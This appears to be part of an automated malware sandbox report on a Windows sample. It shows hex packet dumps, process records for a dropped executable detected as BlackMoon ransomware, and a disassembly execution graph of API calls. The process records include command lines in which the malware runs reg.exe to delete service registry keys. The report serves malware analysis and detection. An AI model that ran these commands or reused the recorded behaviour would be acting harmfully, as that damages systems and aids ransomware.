                                                                                                                                    Aug 6, 2024 10:30:35.627777100 CEST1236INData Raw: b8 ce 42 4b 14 b3 4a 85 5c 59 66 5d 00 62 83 b0 b4 fa 8f 6b 53 34 a3 a3 50 49 a6 f3 40 b4 1d e1 37 b7 05 a4 0f 40 c8 1c b5 2d 9d 01 f3 1d 0f 1b 41 0b 0a 87 7b d0 47 ca 76 a4 10 94 7b 03 6b f2 97 5c ee c0 37 39 80 58 58 b0 e3 56 ef 46 db d6 cd f6
                                                                                                                                    Data Ascii: BKJ\Yf]bkS4PI@7@-A{Gv{k\79XXVFx,LH+=0*Wv8jJ-'j1ChEp%rM6guL@%&'>cq_<%kR%N^A]<5yD4pKE( }77tcxd[S
                                                                                                                                    Aug 6, 2024 10:30:35.627810001 CEST1236INData Raw: fb 87 2d 10 94 b9 4d a3 d0 e0 04 d4 07 d0 7e 1d 24 9a 37 4a f8 3d 2a f6 b1 04 c2 11 ff ec 1f de 66 10 b0 c0 29 46 49 e1 56 80 d6 32 80 30 50 44 bc 27 95 ae cc 49 40 37 07 ec bb 68 93 8c 41 cc 64 82 4a e6 1c e6 c1 d9 d8 7a f4 d9 75 ff 1e cf 4b 42
                                                                                                                                    Data Ascii: -M~$7J=*f)FIV20PD'I@7hAdJzuKBBW(Jv.C;V5=^@_L_js}i<BL0eL5xfUrCn[-NwN.?\uW`oh1MNz WgO:\cpoYR)r3lw
                                                                                                                                    Aug 6, 2024 10:30:35.627844095 CEST1236INData Raw: 7d a3 f3 8b c2 64 f3 64 e7 5a ee 41 6c 56 1a c7 2f c4 51 69 75 2e 2d 7d c4 7c 94 53 1b 96 f7 43 f1 9d 0b 9e 1f c7 f7 e4 1b a4 bb c0 14 5f d0 60 7e c7 59 5c 46 44 b8 71 8c 07 c2 06 26 df c1 ff 80 a2 5e 11 33 43 b2 87 64 4a 91 4c d5 43 e9 81 b5 f8
                                                                                                                                    Data Ascii: }ddZAlV/Qiu.-}|SC_`~Y\FDq&^3CdJLC0'gDW*u"YAoWQ~;;*`xx`Buz*bVf~=="U+.ar\SG,P)M1v8(d}-".y;L)
                                                                                                                                    Aug 6, 2024 10:30:35.632740974 CEST1236INData Raw: c2 72 0f 5b 67 06 80 ac 4e 1a f6 d7 64 dd 1d 0d 69 7e 61 f4 51 59 74 db a6 14 10 92 3e 03 2e 34 f8 d3 21 52 3a 6c e5 ff c9 60 75 3b b7 2a 16 9a 4c 7e 09 02 9b df 06 55 37 3b 29 29 ce 0d 90 bc 36 2e 46 44 18 41 a2 a8 d5 71 00 6c 5c 57 b6 87 93 25
                                                                                                                                    Data Ascii: r[gNdi~aQYt>.4!R:l`u;*L~U7;))6.FDAql\W%e7Q\rHm+Z>Pq}XG\%O&jj!U>aZVDNt;lE|;RDD[d\*i#{+8K[}YV;L^6]!wdN


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:04:29:05
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Users\user\Desktop\1.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\1.exe"
                                                                                                                                    Imagebase:0x710000
                                                                                                                                    File size:30'373'888 bytes
                                                                                                                                    MD5 hash:872012B4C2C1106679159D4C6FE1ABCB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:04:29:08
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\java\DC1FFAF.exe" WfCSiyl7KCmSe3x1d3x7eyiSWnspgSp9HpLfPHsme04=
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'168'440 bytes
                                                                                                                                    MD5 hash:0D79B45E55C20F14D9614596247B7DF2
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000002.00000002.4716955883.0000000010412000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 13%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:04:29:11
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                                                    File size:55'320 bytes
                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:04:30:15
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /f
                                                                                                                                    Imagebase:0xb80000
                                                                                                                                    File size:59'392 bytes
                                                                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:04:30:15
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:04:30:33
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BC66DPQaf /f
                                                                                                                                    Imagebase:0xb80000
                                                                                                                                    File size:59'392 bytes
                                                                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:04:30:33
                                                                                                                                    Start date:06/08/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:8.7%
                                                                                                                                      Total number of Nodes:2000
                                                                                                                                      Total number of Limit Nodes:207
                                                                                                                                      execution_graph 55490 422e40 55491 422e46 PeekMessageA 55490->55491 55492 422e72 55491->55492 55493 422e5c 55491->55493 55493->55491 55494 423bc0 55497 463e90 55494->55497 55496 423bdc 55498 469d30 55497->55498 55499 463ea8 IWBE 55498->55499 55500 463ecb IHJDE 55499->55500 55509 463eb2 55499->55509 55501 463eee 55500->55501 55500->55509 55502 463f02 INSHDY 55501->55502 55504 463f26 55502->55504 55502->55509 55503 464032 _memset _memset _memset 55505 464097 55503->55505 55504->55503 55515 4646c0 _memset 55505->55515 55507 4641d8 INSHD 55508 4642c8 _memset _memset GSDNP 55507->55508 55510 464202 55507->55510 55508->55509 55509->55496 55510->55509 55511 46422d _memset _memset GSDNP 55510->55511 55513 464287 55511->55513 55512 4646c0 46 API calls 55514 4642b6 HINSD 55512->55514 55513->55512 55514->55509 55516 464703 55515->55516 55522 46470a 55516->55522 55523 4660e0 55516->55523 55518 46471d 55533 4663e0 55518->55533 55520 464751 55520->55522 55537 4630c0 55520->55537 55522->55507 55542 4983ad 55523->55542 55525 4660fd _memset _memset _sprintf _memset _strlen 55526 46c940 55525->55526 55527 466191 _strlen 55526->55527 55528 466237 _strlen 55527->55528 55529 4661ab 55527->55529 55532 466215 55528->55532 55548 466040 _strlen 55529->55548 55531 4661ed _strlen 55531->55532 55532->55518 55534 4663f8 55533->55534 55535 4983ad _malloc 4 API calls 55534->55535 55536 466402 55534->55536 55535->55536 55536->55520 55550 460e30 _memset 55537->55550 55546 4983bf _doexit 55542->55546 55547 49844c 55542->55547 55543 4983d0 __FF_MSGBANNER __NMSG_WRITE 55543->55546 55545 49841c RtlAllocateHeap 55545->55546 55546->55543 55546->55545 55546->55547 55549 49835e ___sbh_alloc_block _malloc __read 55546->55549 55547->55525 55548->55531 55549->55546 55558 45e2a0 _memset 55550->55558 55698 4324c0 55701 432510 55698->55701 55706 4741de 55701->55706 55703 432526 55713 47aac3 55703->55713 55705 432504 55707 4741ee 55706->55707 55708 474235 55707->55708 55709 47420c 55707->55709 55710 474244 __snwprintf_s 55708->55710 55711 47421b __snwprintf_s 55709->55711 55712 474265 55710->55712 55711->55712 55712->55703 55718 46fe20 55713->55718 55715 47aaef 55717 47ab32 55715->55717 55722 485e9c 55715->55722 55717->55705 55719 46fe2f 55718->55719 55726 4733ec 55719->55726 55720 46fe69 55720->55715 55723 485eb2 55722->55723 55744 48578f 55723->55744 55727 4733ff 55726->55727 55728 473469 55727->55728 55730 473392 55727->55730 55728->55720 55735 48142c 55730->55735 55732 4733de 55732->55728 55733 4733a8 55733->55732 55734 4733c7 SetWindowsHookExA 55733->55734 55734->55732 55736 481438 __EH_prolog3 55735->55736 55738 481486 55736->55738 55739 481045 55736->55739 55738->55733 55740 48105d 55739->55740 55741 4810a9 GlobalAlloc 55740->55741 55742 4810b6 55740->55742 55741->55742 55743 48110e _memset 55742->55743 55743->55742 55745 48579f 55744->55745 55747 4857d2 55744->55747 55745->55747 55748 485566 55745->55748 55747->55717 55751 48542b 55748->55751 55750 4855db 55750->55747 55752 485437 __EH_prolog3_catch 55751->55752 55753 4854b1 55752->55753 55757 46de74 55752->55757 55753->55750 55755 48550c 55755->55753 55761 4820bc ___sbh_alloc_block __FF_MSGBANNER __NMSG_WRITE RtlAllocateHeap 55755->55761 55760 46de7c 55757->55760 55758 4983ad _malloc 4 API calls 55758->55760 55759 46de9e 55759->55755 55760->55758 55760->55759 55761->55753 55762 467340 RegCreateKeyExA 55763 467379 55762->55763 55764 69e8a860 55765 69e8aa9e 55764->55765 55768 69e8a8b1 _memset 55764->55768 55859 69ebe9d7 55765->55859 55767 69e8aabe 55796 69ebed6c 55768->55796 55771 69e8a914 _memset 55814 69e8d5f0 67 API calls 5 library calls 55771->55814 55772 69e8a904 OutputDebugStringA 55773 69e8aa8d SetEvent 55772->55773 55773->55765 55775 69e8a943 55775->55773 55815 69e8a820 177 API calls 55775->55815 55777 69e8a96d _memset _strncpy 55779 69e8ab33 55777->55779 55784 69e8a9ff inet_addr 55777->55784 55785 69e8aac4 EnterCriticalSection 55777->55785 55789 69e8aa20 EnterCriticalSection 55777->55789 55791 69ec0763 __free_locale 67 API calls 55777->55791 55793 69e8aa72 55777->55793 55816 69e8f3f0 55777->55816 55843 69e85050 80 API calls 2 library calls 55777->55843 55868 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 55779->55868 55781 69e8ab38 55829 69e8f4f0 55784->55829 55867 69e8c980 69 API calls 55785->55867 55788 69e8aaf9 LeaveCriticalSection 55788->55777 55844 69e8c980 69 API calls 55789->55844 55791->55777 55792 69e8aa59 LeaveCriticalSection 55792->55793 55794 69e8aa6c 55792->55794 55858 69eb2b31 5 API calls 2 library calls 55793->55858 55845 69ec0763 55794->55845 55797 69ebee1f 55796->55797 55798 69ebed7e 55796->55798 55877 69ec8aeb 6 API calls __decode_pointer 55797->55877 55800 69ebed8f 55798->55800 55806 69e8a8f7 55798->55806 55807 69ebeddb RtlAllocateHeap 55798->55807 55809 69ebee0b 55798->55809 55812 69ebee10 55798->55812 55872 69ebed1d 67 API calls 4 library calls 55798->55872 55873 69ec8aeb 6 API calls __decode_pointer 55798->55873 55800->55798 55869 69ec8aa3 67 API calls 2 library calls 55800->55869 55870 69ec88f8 67 API calls 7 library calls 55800->55870 55871 69ec1fac GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 55800->55871 55801 69ebee25 55803 69ec2dca _fgets 66 API calls 55801->55803 55803->55806 55806->55771 55806->55772 55807->55798 55874 69ec2dca 55809->55874 55813 69ec2dca _fgets 66 API calls 55812->55813 55813->55806 55814->55775 55815->55777 56011 69ec3c70 55816->56011 55818 69e8f421 WSACreateEvent GetCurrentProcessId WSASocketA 55819 69e8f489 WSAEventSelect 55818->55819 55820 69e8f44d WSAGetLastError 55818->55820 55822 69ebed6c _malloc 67 API calls 55819->55822 56013 69ebeff0 55820->56013 55824 69e8f4a4 55822->55824 55826 69ebe9d7 _$I10_OUTPUT 5 API calls 55824->55826 55828 69e8f4c2 55826->55828 55828->55777 55830 69e8f51f 55829->55830 55836 69e8f679 55829->55836 56234 69e8f700 GetLocalTime SystemTimeToFileTime 55830->56234 55832 69ebe9d7 _$I10_OUTPUT 5 API calls 55833 69e8f68d 55832->55833 55833->55777 55834 69e8f53a _memset 55835 69e8f586 sendto 55834->55835 55835->55836 55842 69e8f5ae _memset 55835->55842 55836->55832 55837 69e8f5d6 WSAWaitForMultipleEvents 55838 69e8f5ec WSAEnumNetworkEvents 55837->55838 55837->55842 55838->55842 55839 69e8f700 3 API calls 55839->55842 55840 69e8f700 3 API calls 55841 69e8f60a recvfrom 55840->55841 55841->55842 55842->55836 55842->55837 55842->55839 55842->55840 55843->55777 55844->55792 55846 69ec076f _fgets 55845->55846 55848 69ec7d5d __lock 65 API calls 55846->55848 55852 69ec07e8 _fgets __expand 55846->55852 55857 69ec07ae 55846->55857 55847 69ec07c3 RtlFreeHeap 55849 69ec07d5 55847->55849 55847->55852 55853 69ec0786 ___sbh_find_block 55848->55853 55850 69ec2dca _fgets 65 API calls 55849->55850 55851 69ec07da GetLastError 55850->55851 55851->55852 55852->55793 55854 69ec07a0 55853->55854 56238 69ec7dc0 __VEC_memcpy VirtualFree VirtualFree HeapFree __shift 55853->56238 56239 69ec07b9 LeaveCriticalSection _doexit 55854->56239 55857->55847 55857->55852 55858->55773 55860 69ebe9df 55859->55860 55861 69ebe9e1 IsDebuggerPresent 55859->55861 55860->55767 56240 69ecf0a3 55861->56240 55864 69ec6a2c SetUnhandledExceptionFilter UnhandledExceptionFilter 55865 69ec6a49 __invoke_watson 55864->55865 55866 69ec6a51 GetCurrentProcess TerminateProcess 55864->55866 55865->55866 55866->55767 55867->55788 55868->55781 55869->55800 55870->55800 55872->55798 55873->55798 55878 69ec77ba GetLastError 55874->55878 55876 69ec2dcf 55876->55812 55877->55801 55893 69ec7645 TlsGetValue 55878->55893 55881 69ec7827 SetLastError 55881->55876 55884 69ec77ed 55904 69ec75aa 6 API calls __crt_waiting_on_module_handle 55884->55904 55886 69ec77ff 55887 69ec781e 55886->55887 55888 69ec7806 55886->55888 55890 69ec0763 __free_locale 64 API calls 55887->55890 55905 69ec76d3 55888->55905 55892 69ec7824 55890->55892 55892->55881 55894 69ec765a 55893->55894 55895 69ec7675 55893->55895 55924 69ec75aa 6 API calls __crt_waiting_on_module_handle 55894->55924 55895->55881 55898 69ec8e33 55895->55898 55897 69ec7665 TlsSetValue 55897->55895 55901 69ec8e3c 55898->55901 55900 69ec77e5 55900->55881 55900->55884 55901->55900 55902 69ec8e5a Sleep 55901->55902 55925 69ed1a46 55901->55925 55903 69ec8e6f 55902->55903 55903->55900 55903->55901 55904->55886 55989 69ec5434 55905->55989 55907 69ec76df GetModuleHandleW 55908 69ec76ef 55907->55908 55909 69ec76f6 55907->55909 55990 69ec1f28 Sleep GetModuleHandleW 55908->55990 55911 69ec770d GetProcAddress GetProcAddress 55909->55911 55912 69ec7731 55909->55912 55911->55912 55914 69ec7d5d __lock 63 API calls 55912->55914 55913 69ec76f5 55913->55909 55915 69ec7750 InterlockedIncrement 55914->55915 55991 69ec77a8 55915->55991 55918 69ec7d5d __lock 63 API calls 55924->55897 55926 69ed1a52 _fgets 55925->55926 55927 69ed1a6a 55926->55927 55937 69ed1a89 _memset 55926->55937 55928 69ec2dca _fgets 66 API calls 55927->55928 55929 69ed1a6f 55928->55929 55938 69ec24f4 6 API calls 2 library calls 55929->55938 55931 69ed1afb RtlAllocateHeap 55931->55937 55933 69ed1a7f _fgets 55933->55901 55937->55931 55937->55933 55939 69ec7d5d 55937->55939 55946 69ec856f 5 API calls 2 library calls 55937->55946 55947 69ed1b42 LeaveCriticalSection _doexit 55937->55947 55948 69ec8aeb 6 API calls __decode_pointer 55937->55948 55940 69ec7d85 EnterCriticalSection 55939->55940 55941 69ec7d72 55939->55941 55940->55937 55949 69ec7c9a 55941->55949 55943 69ec7d78 55943->55940 55977 69ec1f58 67 API calls 3 library calls 55943->55977 55945 69ec7d84 55945->55940 55946->55937 55947->55937 55948->55937 55950 69ec7ca6 _fgets 55949->55950 55951 69ec7cce 55950->55951 55952 69ec7cb6 55950->55952 55957 69ec7cdc _fgets 55951->55957 55981 69ec8dee 55951->55981 55978 69ec8aa3 67 API calls 2 library calls 55952->55978 55955 69ec7cbb 55979 69ec88f8 67 API calls 7 library calls 55955->55979 55957->55943 55959 69ec7cc2 55980 69ec1fac GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 55959->55980 55960 69ec7cfd 55964 69ec7d5d __lock 67 API calls 55960->55964 55961 69ec7cee 55963 69ec2dca _fgets 67 API calls 55961->55963 55963->55957 55966 69ec7d04 55964->55966 55967 69ec7d0c 55966->55967 55968 69ec7d38 55966->55968 55987 69ecf043 InitializeCriticalSectionAndSpinCount _fgets 55967->55987 55969 69ec0763 __free_locale 67 API calls 55968->55969 55977->55945 55978->55955 55979->55959 55982 69ec8df7 55981->55982 55983 69ebed6c _malloc 66 API calls 55982->55983 55984 69ec7ce7 55982->55984 55985 69ec8e0e Sleep 55982->55985 55983->55982 55984->55960 55984->55961 55986 69ec8e23 55985->55986 55986->55982 55986->55984 55989->55907 55990->55913 56009 69ec7c83 LeaveCriticalSection 55991->56009 55993 69ec776a 55993->55918 56009->55993 56012 69ec3c7c __VEC_memzero 56011->56012 56012->55818 56014 69ebf01d 56013->56014 56015 69ebf000 56013->56015 56014->56015 56017 69ebf024 56014->56017 56016 69ec2dca _fgets 67 API calls 56015->56016 56018 69ebf005 56016->56018 56025 69ec90d0 56017->56025 56024 69ec24f4 6 API calls 2 library calls 56018->56024 56021 69ebf04a 56022 69e8f463 OutputDebugStringA 56021->56022 56054 69ec8f1f 56021->56054 56075 69ebeb14 56025->56075 56028 69ec913b 56029 69ec2dca _fgets 67 API calls 56028->56029 56030 69ec9140 56029->56030 56083 69ec24f4 6 API calls 2 library calls 56030->56083 56033 69ec9152 56034 69ebe9d7 _$I10_OUTPUT 5 API calls 56033->56034 56035 69ec9c45 56034->56035 56035->56021 56037 69eca608 101 API calls __output_l 56044 69ec917c __output_l __aulldvrm _strlen 56037->56044 56038 69ec976a 56046 69ec9520 56038->56046 56039 69ec94e3 56039->56038 56043 69ec8dee __malloc_crt 67 API calls 56039->56043 56039->56046 56040 69ec0763 __free_locale 67 API calls 56040->56044 56041 69ec9083 101 API calls _write_string 56041->56044 56045 69ec97a7 56043->56045 56044->56028 56044->56033 56044->56037 56044->56039 56044->56040 56044->56041 56047 69eca63b 101 API calls _write_multi_char 56044->56047 56051 69ed23d8 79 API calls __cftof 56044->56051 56090 69eced4c 77 API calls _LocaleUpdate::_LocaleUpdate 56044->56090 56045->56046 56091 69ec75aa 6 API calls __crt_waiting_on_module_handle 56046->56091 56047->56044 56048 69ec984d 56049 69ec981e 56049->56048 56092 69ec75aa 6 API calls __crt_waiting_on_module_handle 56049->56092 56051->56044 56076 69ebeb27 56075->56076 56082 69ebeb74 56075->56082 56094 69ec7833 56076->56094 56079 69ebeb54 56079->56082 56100 69ec6c8b 69 API calls 6 library calls 56079->56100 56082->56028 56082->56044 56084 69ec628f 56082->56084 56085 69ec629e 56084->56085 56089 69ec62b3 56084->56089 56086 69ec2dca _fgets 67 API calls 56085->56086 56087 69ec62a3 56086->56087 56102 69ec24f4 6 API calls 2 library calls 56087->56102 56089->56044 56090->56044 56091->56049 56092->56048 56095 69ec77ba __getptd_noexit 67 API calls 56094->56095 56096 69ec783b 56095->56096 56097 69ebeb2c 56096->56097 56101 69ec1f58 67 API calls 3 library calls 56096->56101 56097->56079 56099 69ec73f7 75 API calls 5 library calls 56097->56099 56099->56079 56100->56082 56101->56097 56235 69e8f736 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 56234->56235 56236 69e8f74e 56235->56236 56237 69e8f743 GetTickCount 56235->56237 56236->55834 56237->56236 56238->55854 56239->55857 56240->55864 56241 402cd0 56242 402ce3 _DebugHeapAllocator 56241->56242 56245 4041c0 56242->56245 56244 402d04 56246 4041d1 56245->56246 56247 4041d6 std::_String_base::_Xlen 56246->56247 56248 4041db 56246->56248 56247->56248 56250 4041ff 56248->56250 56251 405a90 56248->56251 56250->56244 56252 405aa1 56251->56252 56254 405ac9 56252->56254 56255 406670 56252->56255 56254->56250 56256 4066b0 56255->56256 56259 406960 56256->56259 56258 40671d 56258->56254 56262 406d70 56259->56262 56263 406d85 56262->56263 56264 406d7c 56262->56264 56263->56264 56265 406d92 std::bad_exception::bad_exception 56263->56265 56266 46de74 _Allocate 4 API calls 56264->56266 56265->56264 56267 406972 56266->56267 56267->56258 56268 424950 56269 42496a 56268->56269 56272 437890 _memset 56269->56272 56271 4249f3 56273 4378d4 56272->56273 56280 442060 _memset 56273->56280 56276 4733ec 3 API calls 56277 43792a 56276->56277 56278 437932 SendMessageA 56277->56278 56279 43792e 56277->56279 56278->56279 56279->56271 56281 4378eb 56280->56281 56281->56276 56282 4366d0 56283 436708 56282->56283 56289 43673f 56282->56289 56284 436720 _strlen 56283->56284 56285 436717 56283->56285 56284->56285 56301 4220c0 56285->56301 56288 436759 56298 47f4e4 56288->56298 56294 471402 56289->56294 56292 436791 56293 436770 SendMessageA 56293->56292 56295 471410 56294->56295 56308 482446 56295->56308 56297 47141c 56297->56288 56300 46fe20 3 API calls 56298->56300 56299 43676c 56299->56292 56299->56293 56300->56299 56302 4220dc 56301->56302 56307 4220cf 56301->56307 56303 422147 56302->56303 56324 4222b0 _memcpy_s 56302->56324 56305 422185 _memcpy_s 56303->56305 56306 42215d _memmove_s 56303->56306 56305->56307 56306->56307 56307->56289 56309 482452 __EH_prolog3_catch 56308->56309 56313 48245b 56309->56313 56314 49212b 56309->56314 56311 4824aa 56318 4820bc ___sbh_alloc_block __FF_MSGBANNER __NMSG_WRITE RtlAllocateHeap 56311->56318 56313->56297 56315 492144 56314->56315 56316 492136 56314->56316 56315->56311 56319 48052c 56316->56319 56318->56313 56320 480538 56319->56320 56321 480559 56319->56321 56320->56321 56322 46de74 _Allocate 4 API calls 56320->56322 56323 48054b 56322->56323 56323->56315 56324->56303 56325 4333d0 56328 433410 56325->56328 56327 433401 56329 43343a _memset 56328->56329 56334 433435 56328->56334 56331 43349f 56329->56331 56332 43348d _strlen 56329->56332 56335 4334a8 56331->56335 56337 498344 _LocaleUpdate::_LocaleUpdate _strncpy _memset __mbsnbcpy_l 56331->56337 56332->56331 56334->56327 56335->56334 56336 433570 Shell_NotifyIcon 56335->56336 56336->56334 56337->56335 56338 445dd0 56339 4983ad _malloc 4 API calls 56338->56339 56340 445ded 56339->56340 56341 445e01 _memset 56340->56341 56345 445df9 56340->56345 56342 4983ad _malloc 4 API calls 56341->56342 56343 445e25 56342->56343 56344 445e39 _memset 56343->56344 56343->56345 56347 445e57 56344->56347 56347->56345 56348 498b5b 56347->56348 56349 498b8f ___set_flsgetvalue 56348->56349 56353 498b6f 56348->56353 56356 4a299e 56349->56356 56352 498ba9 __getptd 56355 498bb7 56352->56355 56353->56347 56354 498bff __dosmaperr 56354->56353 56355->56353 56355->56354 56358 4a29a7 56356->56358 56359 498ba1 56358->56359 56360 4aa2c9 56358->56360 56359->56352 56359->56355 56362 4aa2d5 __calloc_impl __read 56360->56362 56361 4aa2ed __read 56361->56358 56362->56361 56363 4aa37e RtlAllocateHeap 56362->56363 56364 4aa34a ___sbh_alloc_block 56362->56364 56365 4aa36d _memset 56362->56365 56363->56362 56364->56362 56365->56362 56366 44c3d0 56367 44c410 56366->56367 56370 44c41f 56367->56370 56377 448b50 socket 56367->56377 56369 44c441 56369->56370 56372 44c4bc _memset _memset 56369->56372 56373 44c56a _strlen 56369->56373 56374 44c5bd _strlen 56369->56374 56375 4220c0 _memmove_s _memcpy_s _memcpy_s 56369->56375 56376 44c610 _strlen 56369->56376 56381 44ba30 56369->56381 56372->56369 56373->56369 56374->56369 56375->56369 56376->56369 56378 448b93 56377->56378 56380 448b8c 56377->56380 56378->56380 56402 4222b0 _memcpy_s 56378->56402 56380->56369 56382 44ba3d 56381->56382 56383 44ba58 _memset _memset 56382->56383 56387 44bac7 56383->56387 56384 44bcb5 _strncmp 56385 44bcf7 _swscanf 56384->56385 56389 44bb9b 56384->56389 56385->56389 56393 44bd7f 56385->56393 56386 44bed1 56386->56389 56391 44bf60 _swscanf 56386->56391 56387->56384 56388 44bb67 select 56387->56388 56387->56389 56390 44bbf2 56387->56390 56388->56387 56388->56389 56389->56369 56390->56384 56390->56389 56391->56389 56392 44bfa2 56391->56392 56392->56389 56394 44c0a7 56392->56394 56395 44c081 _memset 56392->56395 56393->56386 56393->56389 56396 44bead _memset 56393->56396 56397 44c0cc _memset 56394->56397 56401 44c0ea 56394->56401 56395->56394 56403 42a410 56396->56403 56397->56401 56399 44c105 _memset 56399->56401 56400 44c1b5 select 56400->56389 56400->56401 56401->56389 56401->56399 56401->56400 56402->56380 56405 42a428 56403->56405 56404 42a471 56404->56386 56405->56404 56406 42a460 __mbsinc 56405->56406 56406->56405 56407 474a51 56408 474a6c 56407->56408 56409 474a5c KiUserCallbackDispatcher 56407->56409 56410 467750 56411 467776 56410->56411 56412 467792 RegSetValueExA 56411->56412 56413 46777f 56411->56413 56412->56413 56414 432de0 56415 432df4 56414->56415 56416 432e02 56415->56416 56420 474a0f 56415->56420 56423 4419f0 56416->56423 56421 474a2a 56420->56421 56422 474a1a ShowWindow 56420->56422 56422->56416 56424 432e40 56423->56424 56425 441a02 56423->56425 56425->56424 56426 441a4b ShowWindow 56425->56426 56427 441a5f 56425->56427 56426->56424 56427->56424 56428 441b4c ShowWindow 56427->56428 56428->56424 56429 69e8dfcb 56434 69e8dfda _memset std::ios_base::clear ctype ___crtGetEnvironmentStringsA 56429->56434 56430 69ebe9d7 _$I10_OUTPUT 5 API calls 56431 69e8e1c4 56430->56431 56432 69e8e08b select 56433 69e8e0bd WSAGetLastError 56432->56433 56432->56434 56436 69e8dd2f 56433->56436 56434->56432 56434->56433 56435 69e8e0c8 recv 56434->56435 56434->56436 56435->56433 56435->56434 56436->56430 56437 43ea60 56438 4733ec 3 API calls 56437->56438 56439 43eaa2 56438->56439 56440 43eaa6 SendMessageA 56439->56440 56441 43eac6 56439->56441 56443 43f5c0 56440->56443 56444 43f5d1 56443->56444 56445 43f661 _strlen 56444->56445 56446 43f658 56444->56446 56448 43f5dd 56444->56448 56445->56446 56447 43f6a0 _strlen 56446->56447 56451 43f697 56446->56451 56447->56451 56449 43f74f SendMessageA 56448->56449 56452 43f776 SendMessageA 56449->56452 56453 43f78c 56449->56453 56450 43f6df _strlen 56454 43f6d6 56450->56454 56451->56450 56451->56454 56452->56453 56453->56441 56454->56448 56455 43f724 _strlen 56454->56455 56455->56448 56456 43e260 56457 46de74 _Allocate 4 API calls 56456->56457 56458 43e273 56457->56458 56461 43c6f0 56458->56461 56460 43e2dd 56462 43c724 56461->56462 